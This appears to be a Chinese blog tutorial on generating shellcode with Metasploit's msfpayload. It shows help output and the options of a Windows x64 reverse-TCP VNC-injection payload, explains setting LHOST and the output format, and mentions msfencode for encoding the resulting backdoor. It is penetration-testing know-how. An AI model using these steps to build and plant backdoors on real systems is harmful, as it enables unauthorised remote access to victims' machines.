metasploit生成shellcode的命令msfpayload

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

可以生成各种格式的payload, 使用上述usage中最后一个参数设置.

msfpayload的用法和msfcli的用法类似.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

其余就很明了了.选项的设置使用 类似于 LHOST=192.168.0.222 这样.查看options使用小写字母o.  生成类型使用C,J,X等设置.

 

另外msfencode可以用于对生成的payload或者叫为payload或者叫他后门都可以.来加密.

msfencode -l 查看可用的加密方式

msfencode  -h获得帮助

发表评论

电子邮件地址不会被公开。 必填项已用*标注